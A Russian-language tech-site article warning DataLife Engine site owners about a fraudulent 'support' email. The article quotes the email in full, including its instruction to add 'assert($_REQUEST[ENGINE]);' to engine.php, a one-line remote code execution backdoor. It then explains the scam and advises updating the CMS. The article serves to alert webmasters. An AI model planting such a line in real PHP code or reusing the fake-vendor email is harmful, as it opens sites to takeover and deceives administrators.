Возможно, это заинтересует:


    Рекомендуем:
Недавно на сайте смотрели:


    Заправка картриджей: так ли все просто? Само понятие «заправка картриджей» появилось в разговорной речи довольно давно. А именно с того самого памятного момента, когда народные умельцы сообразили ...
    Как добавить игры на Ipod Touch Помимо хранения и воспроизведения ваших любимых фильмов, музыки и фотографий, популярность IPod Touch от Apple выросла благодаря его способности воспроизводить ...
    Новый канал монетизации сайтов CPI-ERA Все привыкли к оплате за клики, а эти ребята утверждают, что пора брать деньги только за установки. Биржа мобильной рекламы CPI-ERA нашла способ ...
    Восстановление утерянных контактов на iPhone IPhone может хранить десятки деловых и личных контактов во внутренней памяти, как в приложении телефона и электронной почте и программ социальных сетей. Apple, ...
    Почему же ломаются жесткие диски? Очень жаль, но на сегодняшний день в мире не существует накопителей, которые можно было бы назвать «долгожителями». Просто конкурентная ситуация на рынке HDD ...
2 052

DLE: Сообщение с темой "Ваш сайт **** может быть взломан!"





DLE Сообщение с темой Несомненно, движок DataLife Engine является весьма популярным среди владельцев разнонаправленных Интернет-ресурсов. В последние годы внимание к нему становится все выше, выходят новые версии, дополнения и модули для ДЛЕ. Это все привлекает и нехороших людей, проще говоря - мошенников. С одним из таких случаев, недавно смогли столкнуться многие обладатели ресурсов на этой системе управления.




Ваш DLE-сайт может быть взломан



Наверняка, некоторые владельцы сайтов на популярной CMS DLE уже столкнулись с подобным сообщением на почту:

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте ***** нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: *****/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[ENGINE]);

С уважением,
Служба поддержки «DataLife Engine»


Что делать вебмастеру?


Однако, в целях реальной безопасности Вашего сайта крайне не рекомендуется следовать совету из этого сообщения, так как ничего общего с разработчиками DLE оно не имеет и рассылается не ими, а злоумышленниками, которые постредством подобной манипуляции могут навредить (мягко говоря) работе ресурса. Так, используя полученную уязвимость, с помощью PHP-сценария может формироваться POST-пакет для последующей возможной отправки файла с некоторым PHP-кодом. Ну а дальше уже дело фантазии.

Кроме того, стоит иметь ввиду, что подобные сообщения отправляются посредством обратной связи на сайте и по адресам электронной почты, не имеющим никакого отношения к адресам, на которые зарегистрированы лицензионные копии ДЛЕ на сайте разработчика. При отправке письма используются проксовые айпи адреса, либо TOR.

Если у Вас все-таки возникли обоснованные сомнения по поводу безопасности Вашего сайта на ДЛЕ, то:

1. Если используется нулль-версия, рассмотрите вариант перехода на лицензию.

2. Если первый вариант не подходит, обновите вашу CMS DataLife Engine до последней актуальной версии. Разработчики постоянно занимаются модернизацией и усовершенствованием этого движка, в том числе и в плане безопасности.

3. Все выявленные уязвимости DLE и выпущенные баг-фиксы размещаются на странице официального сайта CMS DataLife Engine. Отслеживайте эту информацию именно там.


Будьте внимательны, чтобы лишний раз не давать возможностей для взлома Вашего сайта.

Теги: Ваш сайт может быть взломан

Возможно, Вас заинтересуют похожие тематические статьи и рекомендации:

  • Как выбрать хостинговую компанию для joomla 3.0На сегодняшний день, существует большое количество хостинговых компаний, предлагающих хостинг для joomla. Поэтому, многие владельцы сайтов, сталкиваются с проблемой выбора хостинг - провайдера. Для
  • 7 расширений для браузеров и программы безопасности ПККак приятно проводить время в сети Интернет: тут и приятное общение, тут и интересные новости, тут и масса полезной и нужной информации. Но в пользовании Сетью есть и свои, негативные стороны:
  • Создание сайтов: как это происходит?В наше время становится всё больше сайтов. Да, каждый день появляется масса новых проектов, каждый из которых чем-то похож друг на друга. Уже давно кануло в небытие то время, когда появлялись свежие
  • Невинных посетителей сайта обманом втянули в ДДОС-атакуИсследователи обнаружили новую атаку на отказ в обслуживании, применявшую невиданную ранее технику, чтобы тайком заставить тысячи обычных пользователей интернета бомбить цель огромным количеством
  • Как запустить сайт на СВОЁМ компьютере?Чтобы работать разработчиком сайтов, просто необходимо, прежде чем загрузить файлы на веб-сервер, поработать со своим шаблоном. Что нужно, чтобы запустить сайт локально? Подобному вопросу посвящено
  • Новая уязвимость в Internet ExplorerАвторитетный новостной портал Professional FireEye сообщил, что компьютерные системы довольно большого количества жертв новой уязвимости в популярном браузере Internet Explorer были инфицированы
  • Некоторые виды заработка в ИнтернетеПопробуем в данной статье выделить некоторые виды заработка в Интернете, способные принести реальный денежный доход. Если смотреть с самого начала пути человека, который собирается зарабатывать в
  • Способы монетизации сайтов-сателлитовСуществуют сателлиты, которые предназначены для заработка, или же поддерживающие основной проект. В случае, если Вы решили зарабатывать именно на сателлитах, Вам необходимо узнать, каким образом
  • Заработок на файлообменникахВ связи с тем, что постоянно происходит увеличение скорости доступа к просторам Интернета, появились возможности обмениваться между собой какими-либо файлами. Обмениваться можно как крупными файлами,
  • Смотрим любые фильмы в 3DКак смотреть фильмы, а так же видео в формате 3D? Для этого нам понадобится KMPlayer, скачать который вы можете по ссылке в конце статьи. Так же нам понадобится фильтр для KMPlayer, что бы мы смогли

Темы, отмеченные пользователями:

7 самых бесполезных переносных устройств-гаджетов
Среди переносных электронных устройств – т.н. гаджетов – из всех этих миллионов и миллиардов нужных и полезных «штучек» существует тонкая прослойка совершенно бесполезных устройств, которые могут пригодиться разве что для розыгрыша друга или тупого подарка на день рождения. Среди всей этой массы

Как включить и настроить iMessage на iPhone и iPad
iMessage – это услуга корпорации Apple для передачи моментальными сообщениями. В отличие от SMS, за информацию переданную iMessage не берется плата с юзера. С их помощью возможно переписываться со своими знакомыми, у каких есть хоть какое устройство от знаменитой компании Apple. Для передачи

Nexus 6: новый флагман Google
Как-то скромненько и, можно сказать, втихую прошла недавно презентация нового флагманского смартфона от Google – модели Nexus 6. Как и предполагалось ранее, Nexus 6 собирала компания Motorola и поэтому стали ясны проявления дизайна смартфонов компании в новом творении для Google. С первого взгляда

Добавить комментарий

Имя:*
E-Mail:
Комментарий:
Вопрос:
Сколько будет: двадцать два плюс 3 ? Ответ цифрой.
Ответ:*
Введите то, что показано на изображении: *